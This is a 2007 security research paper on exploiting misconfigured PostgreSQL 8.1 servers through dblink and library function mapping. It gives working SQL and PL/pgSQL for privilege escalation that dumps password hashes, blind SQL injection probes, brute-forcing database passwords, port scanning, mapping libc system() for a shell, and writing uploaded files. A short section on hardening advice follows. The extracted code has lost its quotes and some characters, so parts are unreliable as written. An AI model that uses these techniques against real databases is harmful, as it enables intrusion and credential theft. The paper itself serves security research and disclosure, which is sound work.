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Having Fun With PostgreSQL

Nico Leidecker [email protected]

June 05 2007


Having Fun With PostgreSQL

1 Preface 2 dblink: The Root Of All Evil 2.1 Privilege Escalation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.2 Brute-Forcing User Accounts . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2.3 Port-Scanning Via Remote Access . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 Mapping Library Functions 3.1 Getting A Shell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3.2 Uploading Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 From Sleeping And Copying In PostgreSQL 8.2 5 Recommendation And Prevention 6 Introducing pgshell 7 Contact & Copyright 3 3 3 5 7 8 9 9 10 10 10 11

Having Fun With PostgreSQL

Elephant On The Rise

PostgreSQL is an open-source database management system (DBMS), released under the BSD license with the current stable version of 8.2.3. It derived from the POSTGRES project at the University of California, Berkeley starting in 19861 . POSTGRESs nal performance in version 4.2 dated 19942 while PostgreSQL became one of the most popular DBMS today. In version 8.0 approximately 1 million downloads were recorded within seven months of its release. The PostgreSQL project registers a number of signicant users like BASF, Fujitsu, Sun Microsystems or the U.S. Center For Disease Control and Prevention3 .


This document presents a couple of ideas for exploiting weaknesses in typical PostgreSQL congurations. Most of these ideas wont be new but are still dicult to nd or easy to miss, most documentation aimed at database administrators often do not address or overlook these issues. The following examples where tested on PostgreSQL 8.1 and may dier from previous versions. Version 8.2 brings further signicant changes that are discussed in section 4.

dblink: The Root Of All Evil

The Database Link library (dblink) has been part of the PostgreSQL project since version 7.2. As the name suggests it is used for interconnetions between remote databases. The contribution comes in handy, when, for instance, data from a remote database needs to be included into a local database. Typical usage for the function is creating a view from a remotely executed query:
CREATE VIEW entry_states AS SELECT * FROM dblink(host= dbname=remotedb user=dbuser password=secretpass, SELECT id, title FROM entries) AS remote_entries(id INT, title TEXT);

This is just a simple example showing how one might use dblink. But of more interest are the ways in which this can be abused. The library itself was not designed to allow misuse, but in combination with a poorly miscongured PostgreSQL it turns into a paradisiacal playground for people with curious minds.


Privilege Escalation

The default PostgreSQL conguration from the sources has local trust authentication enabled. Any connection made from the local host to the database will be accepted and the user directly logged in without the need to supply a password. It is hard to understand, why such a feature is part of the default conguration and yet, the warning in the corresponding le (pg hba.conf ) is unmistakable: CAUTION: Conguring the system for local trust authentication allows any local user to connect as any PostgreSQL user, including the database superuser. If you do not trust all your local users, use another authentication method.
1 2 3


Privilege Escalation

Having Fun With PostgreSQL

However an experienced PostgreSQL administrator probably wont get into trouble with that, but people who are new to PostgreSQL or databases can easily miss this and hence fail to disable the local trust authentication. Having outlined above the dblink library, consider combining it with the local trust authentication. This leads to the question: What happens if we use dblink to connect to the local host?
SELECT * FROM dblink(host= user=someuser dbname=somedb, SELECT column FROM sometable) RETURNS (result TEXT);

The nested query will be executed with privileges of someuser and return the results to the current session. Generally it is accepted that the current user is not a superuser. But once we know the name of a superuser, have identied a host as having dblink installed and the local trust authentication enabled, we have a much greater scope. Here is an example from an unprivileged user named someuser :
$ psql -U someuser somedb somedb=> select usename, usesuper from pg_user where usename = current_user; usename | usesuper ----------+---------someuser | f (1 row) somedb=> select usename from pg_user where usesuper=t; usename --------admin (1 row)

To prove the point, we will try to query the password hashes from pg shadow rst as the unprivileged someuser and then via privilege escalation and the user admin.
somedb=> select usename, passwd from pg_shadow; ERROR: permission denied for relation pg_shadow somedb=> SELECT * FROM dblink(host= user=admin dbname=somedb, select usename,passwd from pg_shadow) returns (usename TEXT, passwd TEXT); usename | passwd ----------+------------------------------------admin | md549088b3a87b8ce56ecd39259d17ff834 someuser | md5e7b0ce63e5eee01ee6268b3b6258e8b2 (2 rows)

These queries could of course be used within SQL injection attacks. Obviously an important requirment is identifying whether the dblink library is installed and the localtrust authentication enabled. Taking the most dicult option, lets assume that were facing a blind SQL injection attack, these two simple queries would bring us the information we need:
SELECT repeat(md5(1), 500000) WHERE EXISTS (SELECT * FROM pg_proc WHERE proname=dblink AND pronargs=2);


Brute-Forcing User Accounts

Having Fun With PostgreSQL

SELECT repeat(md5(1),500000) WHERE EXISTS ( SELECT * FROM dblink(host= user=admin dbname=somedb, SELECT 1) RETURNS (i INT));

By being able to escalate privileges we are able to perform more interesting functions. which are outlined in the following sections. But before we go there, lets take a deeper look at dblink and what can be achieved without privilege escalation.


Brute-Forcing User Accounts

If there is no local trust authentication enabled we can still attempt to brute-force user accounts, perhaps there is even an account with a weak password! A very straight forward way would be to send word by word in an SQL injection query, embedded in a POST or GET request to the web server. However, the unusual high amount of requests made may trigger IPS based devices. So, another approach that only requires one or two requests and leaves all the processing to the datbase is required, consider this; Using PL/pgSQL, a loadable procedural language for the PostgreSQL database system, which an administrator will have to have created by executing CREATE LANGUAGE plpgsql. We can verify its existance using:
somedb=> SELECT lanname, lanacl FROM pg_language WHERE lanname = plpgsql; lanname | lanacl ---------+--------plpgsql | (1 row)

Eureka! So, it does exist and even better: By default, creating functions is a privilege granted to PUBLIC, where PUBLIC refers to every user on that database system. To prevent this, the administrator would have had to revoke the USAGE privilege from the PUBLIC domain:

In that case, our previous query would output dierent results:

somedb=> SELECT lanname, lanacl FROM pg_language WHERE lanname = plpgsql; lanname | lanacl ---------+----------------plpgsql | {admin=U/admin} (1 row)

However, we are allowed to use the language and thus can create arbitrary functions. From this we create a function that compiles words and uses them in a dblink connection string with the local host set as the target. Additional, we need exception handling, as an error will be raised, if authentication fails.
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT, username TEXT, dbname TEXT) RETURNS TEXT AS $$ DECLARE word TEXT; BEGIN FOR a IN 65..122 LOOP FOR b IN 65..122 LOOP


Brute-Forcing User Accounts

Having Fun With PostgreSQL

FOR c IN 65..122 LOOP FOR d IN 65..122 LOOP BEGIN word := chr(a) || chr(b) || chr(c) || chr(d); PERFORM(SELECT * FROM dblink( host= || host || port= || port || dbname= || dbname || user= || username || password= || word, SELECT 1) RETURNS (i INT)); RETURN word; EXCEPTION WHEN sqlclient_unable_to_establish_sqlconnection THEN -- do nothing END; END LOOP; END LOOP; END LOOP; END LOOP; RETURN NULL; END; $$ LANGUAGE plpgsql;

This purely incremental brute-force method will return the word it found as the result following successful authentication or NULL. Unfortunately as with all brute force techniques, this will have to run a for a long time and may not yeld positive results. Another option is using words from within a pre-compiled word list. One way to do to this, is to use the capabilities of another remote database;
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT, username TEXT, dbname TEXT) RETURNS TEXT AS $$ BEGIN FOR word IN (SELECT word FROM dblink(host= user=name password=qwerty dbname=wordlists, SELECT word FROM wordlist) RETURNS (word TEXT)) LOOP BEGIN PERFORM(SELECT * FROM dblink( host= || host || port= || port || dbname= || dbname || user= || username || password= || word, SELECT 1) RETURNS (i INT)); RETURN word; EXCEPTION WHEN sqlclient_unable_to_establish_sqlconnection THEN -- do nothing END; END LOOP; RETURN NULL; END; $$ LANGUAGE plpgsql


Port-Scanning Via Remote Access

Having Fun With PostgreSQL

Depending on the data in the database, it would be wise to get the words from the actual data. Here is a simple example of such a function, which gets and queries every table and attribute of type TEXT from pg attribute and pg class.
CREATE OR REPLACE FUNCTION brute_force(host TEXT, port TEXT, username TEXT, dbname TEXT) RETURNS TEXT AS $$ DECLARE qry TEXT; row RECORD; word text; BEGIN FOR row IN (SELECT relname, attname FROM (pg_attribute JOIN pg_type ON atttypid=pg_type.oid) JOIN pg_class ON attrelid = pg_class.oid WHERE typname = text) LOOP BEGIN qry = SELECT || row.attname || AS word || FROM || row.relname || || WHERE || row.attname || IS NOT NULL; FOR word IN EXECUTE (qry) LOOP BEGIN PERFORM(SELECT * FROM dblink( host= || host || port= || port || dbname= || dbname || user= || username || password= || word, SELECT 1) RETURNS (i INT)); RETURN word; EXCEPTION WHEN sqlclient_unable_to_establish_sqlconnection THEN -- do nothing END; END LOOP; END; END LOOP; RETURN NULL; END; $$ language plpgsql;

This could be improved by splitting the result by spaces and by removing all the unwanted special characters. But thats not to be done here


Port-Scanning Via Remote Access

When a connection attempt fails, dblink throws an sqlclient unable to establish sqlconnection exception including an explanation of the error. Examples of these details are listed below.
SELECT * FROM dblink_connect(host=

Having Fun With PostgreSQL

port=5678 user=name password=secret dbname=abc connect_timeout=10);

Host is down DETAIL: could not connect to server: No route to host Is the server running on host and accepting TCP/IP connections on port 5678? Port is closed DETAIL: could not connect to server: Connection refused Is the server running on host and accepting TCP/IP connections on port 5678? Port is open DETAIL: server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request or DETAIL: FATAL: password authentication failed for user name Port is open or ltered DETAIL: could not connect to server: Connection timed out Is the server running on host and accepting TCP/IP connections on port 5678? Unfortunately, there does not seem to be a way of getting the exception details within a PL/pgSQL function. But you can get the details if you can connect directly to the PostgreSQL server. If it is not possible to get usernames and passwords directly out of the system tables, the wordlist attack described in the previous section might prove successful.

Mapping Library Functions

If we take a closer look at the way dblink is deployed, we nd these lines:

CREATE OR REPLACE FUNCTION dblink_connect (text) RETURNS text AS $libdir/dblink,dblink_connect LANGUAGE C STRICT;

This is a simple CREATE statement with the $libdir variable representing the PostgreSQL library directory. After executing the query, a function is mapped from the dblink library to dblink connect(), which expects a single TEXT argument. There are no restrictions on what libraries and what functions are mapped or in what directory we nd the libraries. Hence, we can create a function and map it to any function of an arbitrary library ... lets say libc :

By default, a non-super user wont have permissions to create functions using the language c. But in the unlikely event that we are superuser or using the privilege escalation outlined above we can get access to a shell.


Getting A Shell

Having Fun With PostgreSQL


Getting A Shell

PostgreSQL oers a function for c strings, called cstring. This allows us to not only map functions expecting integer arguments but also allows us to transform TEXT structures into raw character arrays. And that opens us these doors: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS /lib/, system LANGUAGE C STRICT; Everything we do with system() will be executed in the servers context. It is however unlikely this will be root.


Uploading Files

Experimenting with functions it is possible to open, write and close les. Whilst there might be other methods by which we can undertake this, here is an interesting method for sending chunks from a binary le to the database server and then writing that data to a le. The funtions required are:

Uploading binary data to a web server which is then forwarded to a database server is likely to fail. For this to succeed we need to encode the binary data into alpha numeric characters. Base64 encoding is our friend and the friendly PostgreSQL server incoporates stored procedures to make that an easy way. PostgreSQL will fork a process for every new connection, so that a le descriptor will be lost after connection has been closed. Which means we need to open the same le for every seperate piece of data we send. This is not an problem, though. The following function opens, writes to and closes a le, as well as decodes the base64 string before writing it to the le:
CREATE OR REPLACE FUNCTION write_to_file(file TEXT, s TEXT) RETURNS int AS $$ DECLARE fh int; s int; w bytea; i int; BEGIN SELECT open(textout(file)::cstring, 522, 448) INTO fh; IF fh <= 2 THEN RETURN 1; END IF; SELECT decode(s, base64) INTO w; i := 0; LOOP EXIT WHEN i >= octet_length(w); SELECT write(fh, textout(chr(get_byte(w, i)))::cstring, 1) INTO rs;

Having Fun With PostgreSQL

IF rs < 0 THEN RETURN 2; END IF; i := i + 1; END LOOP; SELECT close(fh) INTO rs; RETURN 0; END; $$ LANGUAGE plpgsql;

The numbers 522 and 448 in the open() function call are what ( O CREAT | O APPEND | O RDWR ) and S IRWXU would stand for. Please note, that those values might vary from operating systems.

From Sleeping And Copying In PostgreSQL 8.2

Many things in this paper rely on version 8.1 of the PostgreSQL database management system and would not work or work dierently in version 8.2. For example within the new version there is a builtin sleep function called pg sleep. This function actually would make life easier. But another new feature is the compatibility check which runs when loading libraries. Every library intended for use with PostgreSQL must carry a magic block to identify itself. Of course, libc does not have that block and thus cannot be loaded. In short, we cannot use system() for executing shell commands and cannot use write(), open() or close() for writing to les. But what we can do is use the COPY command to write to les. Unfortunately we need superuser privileges in order to copy data from a table to a le and we cannot write binary data to a le. So the question is: Does writing ASCII data with low privileges to a world writable directory like /tmp help us?! Probably not.

Recommendation And Prevention

The rst thing one should do to prevent the attacks outlined here is to disable the local trust authentication. Disabling it is done by commenting or editing the default lines on the bottom in pg hba.conf to something like:
local host all all all all ident sameuser md5

This forces identication of any user connecting to the database from the local host or a remote host. Privilege escalation via dblink is then no longer possible. To disable function mapping with arbitrary libraries its probably best to upgrade to the latest PostgreSQL version. But it would also be sucient to ensure all users have low privileges. NonSuperusers cannot map library functions.

Introducing pgshell

pgshell is a Perl script that does, what has been covered in this paper. It exploits SQL injections in order to gather information on the target system, escalade privileges, spawn a shell and upload les. For a proper description, please refer to


Having Fun With PostgreSQL

Contact & Copyright

Nico Leidecker, [email protected] Copyright c Portcullis Computer Security Limited 2007, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the users risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.


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